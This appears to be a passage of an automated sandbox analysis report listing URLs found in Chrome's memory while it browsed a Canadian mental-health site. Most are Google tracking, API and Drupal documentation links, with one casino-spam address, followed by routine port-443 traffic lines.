Source: chrome.exe, 00000000.00000002.2490662725.000028EC03FB4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/additional-tools-and-linksv=10.1.0
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/emotions
Source: chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/end-user-licence-agreement
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/health-habits
Source: chrome.exe, 00000000.00000002.2492877168.000028EC0414C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/interests
Source: chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499247188.000028EC062C0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://fountainofhealth.ca/thrive/privacy-policy
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://open-bid.com
Source: chrome.exe, 00000000.00000003.2301920756.000028EC04738000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302499245.000028EC027CD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.office.com/calendar/
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pagead2.googlesyndication.com
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pagead2.googlesyndication.com/ccm/collect
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pagead2.googlesyndication.com/pagead/conversion
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://people.googleapis.com/
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330696474.000028EC06F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2330848936.000028EC04E84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331000442.000028EC04F8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2336785775.000028EC03D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488945594.000028EC03E04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501436245.000028EC06920000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494505049.000028EC04592000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2472305495.000028EC028B6000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302567636.000028EC04908000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2505400410.000028EC07AEC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2501198410.000028EC068C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2354362022.000028EC07CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2491958834.000028EC040B0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2499781921.000028EC06410000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=json
Source: chrome.exe, 00000000.00000002.2506905817.000028EC07D00000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://play.google.com/log?hasfast=true&authuser=0&format=json7
Source: chrome.exe, 00000000.00000003.2301090400.000028EC0497D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385578188.000028EC077B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301090400.000028EC04978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2302407484.000028EC077B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2468568226.000028EC0231C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://policies.google.com/
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://postrelease.com
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api/store#subscribelistener
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/tutorials/fundamentals/part-4-store#creating-a-store-with-enhancers
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/tutorials/fundamentals/part-4-store#middleware
Source: chrome.exe, 00000000.00000003.2331553095.000028EC08604000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331869363.000028EC05804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331543436.000028EC08204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2331101993.000028EC05434000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/tutorials/fundamentals/part-6-async-logic#using-the-redux-thunk-middleware
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://samplicio.us
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2478072951.000028EC03020000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://semafor.com
Source: chrome.exe, 00000000.00000002.2476347082.000028EC02DF0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477429198.000028EC02F50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2494650570.000028EC045A4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/a/37825072/145846
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stats.g.doubleclick.net/g/collect
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stats.g.doubleclick.net/g/collect?v=2&
Source: chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://support.google.com/chrome?p=desktop_tab_groups
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://td.doubleclick.net
Source: chrome.exe, 00000000.00000002.2494712430.000028EC045CC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319699836.000028EC04912000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2496237915.000028EC0490C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344781235.000028EC07948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320493460.000028EC029A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://thrive.fohwtc.ca/thrive/request-a-speaker#request-speaker
Source: chrome.exe, 00000000.00000003.2361293065.000028EC067ED000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2352813519.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400354743.000028EC04A4D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400561655.000028EC06D49000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500311139.000028EC06614000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://topkasynaonline.com/vulkanbet-bonus-bez-depozytu/
Source: chrome.exe, 00000000.00000002.2479493141.000028EC03214000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://torneos.gg
Source: chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488595121.000028EC03D04000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2500209375.000028EC06578000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/FoHTHRIVE
Source: chrome.exe, 00000000.00000002.2487690510.000028EC03BC4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2488392167.000028EC03CA0000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2344648335.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wellnessapp.ca/
Source: chrome.exe, 00000000.00000002.2504370678.000028EC078C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2385420147.000028EC07EBC000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2377731474.000028EC06D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504302862.000028EC078A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2314538909.000028EC0284C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04264000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://wellnessapp.ca/app/login
Source: chrome.exe, 00000000.00000002.2484637468.000028EC0370C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2504142825.000028EC07868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org)
Source: chrome.exe, 00000000.00000002.2484637468.000028EC0370C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org)X-Drupal-Cache:
Source: chrome.exe, 00000000.00000003.2320348249.000028EC05C68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/core/deprecation#javascript
Source: chrome.exe, 00000000.00000003.2320644460.000028EC06CBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319331070.000028EC06804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320841110.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/node/2940704
Source: chrome.exe, 00000000.00000003.2320746478.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320644460.000028EC06CBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319331070.000028EC06804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320841110.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/node/3154948.
Source: chrome.exe, 00000000.00000003.2344822174.000028EC047E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/project/bootstrap/issues/3013236
Source: chrome.exe, 00000000.00000003.2320746478.000028EC067DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320644460.000028EC06CBB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2319331070.000028EC06804000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320841110.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/project/drupal/issues/2973400
Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/project/webform/issues/2856795
Source: chrome.exe, 00000000.00000003.2323075165.000028EC03AF7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322834065.000028EC05158000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2322977322.000028EC03828000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.drupal.org/project/webform/issues/3068998
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000000.00000003.2301202727.000028EC06240000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2486476343.000028EC039A4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301090400.000028EC0497D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2474265467.000028EC02B50000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2301090400.000028EC04978000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2320556499.000028EC04820000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2437824544.000001E4AB3A7000.00000004.00000001.00040000.00000007.sdmp, chrome.exe, 00000000.00000002.2474190232.000028EC02B3C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2483787060.000028EC03640000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/ccm/collect
Source: chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/browser-features/
Source: chrome.exe, 00000000.00000002.2475075490.000028EC02C28000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/browser-tools/
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/acdvcifl2ztime6bsz3eijtcfeaq_2025.5.15.1/kiabhab
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindg
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/l4z3clyi7urxnsu2inhaenyzam_2025.5.20.1303/ggkkeh
Source: chrome.exe, 00000000.00000002.2476477758.000028EC02E04000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/dl/release2/chrome_component/l7xtcygg3vebugalfkm3b3dp3u_6.7431.9692/pkomkdjpm
Source: chrome.exe, 00000000.00000002.2472240524.000028EC0283C000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2477907567.000028EC03017000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2473409026.000028EC02A34000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 00000000.00000003.2332533118.000028EC06CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332565269.000028EC04794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2348376359.000028EC05189000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498042478.000028EC052D4000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2343314060.000028EC05188000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332607347.000028EC065E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2349100192.000028EC06404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.js
Source: chrome.exe, 00000000.00000003.2332533118.000028EC06CE4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332565269.000028EC04794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2332607347.000028EC065E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/js/th/v15QCjm6WO3QEs80chG8QfS1HlFrDoWBLlSvxspkiuA.jsaDb
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/pagead/1p-conversion
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/pagead/form-data
Source: chrome.exe, 00000000.00000002.2469101930.000028EC0239C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_ZT0XGPL
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/travel/flights/click/conversion
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleadservices.com
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleadservices.com/pagead/conversion
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000000.00000002.2469369795.000028EC023C4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000000.00000003.2313568382.000028EC06F9D000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/a?
Source: chrome.exe, 00000000.00000003.2400466181.000028EC07EBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2498622215.000028EC05C28000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361169372.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000002.2467653990.000028EC02270000.00000004.00000001.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2361252175.000028EC04A3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2400228006.000028EC024D0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-WF39Z4TEVT
Source: chrome.exe, 00000000.00000003.2313814600.000028EC04404000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313656839.000028EC04204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000000.00000003.2313605417.000028EC03ABE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googletagmanager.com/static/service_worker/
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
